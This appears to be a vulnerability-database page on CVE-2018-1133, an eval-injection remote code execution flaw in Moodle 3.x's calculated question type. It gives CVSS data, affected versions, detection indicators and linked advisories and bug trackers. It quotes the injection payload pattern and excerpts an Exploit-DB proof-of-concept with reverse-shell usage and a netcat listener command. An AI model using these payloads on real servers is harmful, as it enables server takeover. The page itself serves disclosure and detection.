CVE-2018-1133
published 2018-05-25CVE-2018-1133: An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
PriorityP272high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
32.23%
98.1th percentile
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moodle | moodle | >= 3.1 < 3.1.12 | 3.1.12 |
| moodle | moodle | 3.1.0 – 3.1.11 | — |
| moodle | moodle | >= 3.2 < 3.2.9 | 3.2.9 |
| moodle | moodle | 3.2.0 – 3.2.8 | — |
| moodle | moodle | >= 3.3 < 3.3.6 | 3.3.6 |
| moodle | moodle | 3.3.0 – 3.3.5 | — |
| moodle | moodle | >= 3.4 < 3.4.3 | 3.4.3 |
| moodle | moodle | 3.4.0 – 3.4.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to /question/question.php with qtype=calculated containing eval-injectable answer fields such as backtick-wrapped $_GET references (e.g., `$_GET[0]`) in the answer[0] parameter. ↗
- →Detect exploitation attempts by looking for the pattern /*{a*/`...`;//{x}} in HTTP POST bodies targeting Moodle calculated question endpoints, which is the eval-injection payload structure. ↗
- →The exploit follows a specific multi-step HTTP sequence: login → course load → enable editing → add quiz → configure quiz → add calculated question → submit evil answer formula. Correlating this sequence from a single session is a strong indicator of exploitation. ↗
- →The vulnerability is tracked as MSA-18-0007 and described as: Calculated question type allows remote code execution by Question authors. Monitor teacher-role accounts creating Calculated questions. ↗
- ·Exploitation requires a valid teacher (or question author) account on the Moodle instance and a course ID that the teacher has access to; unauthenticated exploitation is not possible. ↗
- ·The exploit PoC targets Moodle 3.4.1 specifically; the CVE affects Moodle 3.x broadly. Verify affected version range before scoping detection. ↗
- ·The reverse shell payload in the PoC uses Python and /bin/sh; server environments without Python or with restricted shell access may require a different payload, meaning the specific command IOC may vary in real attacks. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
osv8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Moodle calculated question type allows remote code execution by Question authors
osv·2022-05-13
CVE-2018-1133 [HIGH] Moodle calculated question type allows remote code execution by Question authors
Moodle calculated question type allows remote code execution by Question authors
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
GHSA
Moodle calculated question type allows remote code execution by Question authors
ghsa·2022-05-13
CVE-2018-1133 [HIGH] CWE-94 Moodle calculated question type allows remote code execution by Question authors
Moodle calculated question type allows remote code execution by Question authors
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
OSV
CVE-2018-1133: An issue was discovered in Moodle 3
osv·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133: An issue was discovered in Moodle 3
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
No detection rules found.
Exploit-DB
Moodle 3.4.1 - Remote Code Execution
exploitdb·2019-03-15·CVSS 8.8
CVE-2018-1133 [HIGH] Moodle 3.4.1 - Remote Code Execution
Moodle 3.4.1 - Remote Code Execution
---
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
*
* user The account username
* pass The password to the account
* ip Callback IP
* port Callback Port
* course Valid course ID belonging to the teacher
*
* Make sure you're running a netcat listener on the specified port before
* executing this script.
*
* > nc -lnvp 1010
*
* This will attempt to open up a reverse shell to the listening IP and port.
*
* You can start the script with `debug=true` to enable debug mode.
*/
namespace exploit {
class moodle {
public $ip;
public $port;
public $courseId;
public $cookie_jar;
public $url;
public $pass;
public $payload;
public $quizId = false;
public $moodleSession = false;
public $moodleKey;
// Ver
Exploit-DB
Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
exploitdb·2018-10-11·CVSS 5.5
CVE-2018-8533 [MEDIUM] Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
---
# Exploit Title: Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Venodor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)
# CVE: CVE-2018-8533
# References:
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory
Bugzilla
CVE-2018-12179 edk2: improper configuration insystem firmware leads to privilege escalation
bugzilla·2019-03-29·CVSS 7.8
CVE-2018-12179 [HIGH] CVE-2018-12179 edk2: improper configuration insystem firmware leads to privilege escalation
CVE-2018-12179 edk2: improper configuration insystem firmware leads to privilege escalation
Improper configuration in system firmware for EDK II may allow unauthenticated user to potentially enable escalation of privilege, information disclosure and/or denial of service via local access.
Reference:
https://edk2-docs.gitbooks.io/security-advisory/content/opal-blocksid-setting-disabled-after-s3.html
Discussion:
Created edk2 tracking bugs for this issue:
Affects: fedora-all [bug 1694085]
---
Created edk2 tracking bugs for this issue:
Affects: epel-all [bug 1694086]
---
Can you please work with the TianoCore Bugzilla InfoSec group to open up the upstream ticket to the public? Thank you.
---
Upstream bug:
https://bugzilla.tianocore.org/show_bug.cgi?id=1133
Patch proposed in upstrea
Bugzilla
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [fedora-all]
bugzilla·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [fedora-all]
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit m
Bugzilla
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [epel-all]
bugzilla·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [epel-all]
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit messa
Bugzilla
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release
bugzilla·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release
MSA-18-0007: Calculated question type allows remote code execution by Question authors - CVE-2018-1133
Teacher creating Calculated question can intentionally cause remote code execution on server
https://moodle.org/mod/forum/discuss.php?d=371199
MSA-18-0008: Users can download any file via portfolio assignment caller class - CVE-2018-1134
Students who submitted assignments and exported it to portfolios can download any stored Moodle file by changing download URL
https://moodle.org/mod/forum/discuss.php?d=371200
MSA-18-0009: Portfolio forum caller class allows a user to download any file - CVE-2018-1135
Students who posted on forum and exported the post to po
2018-05-25
Published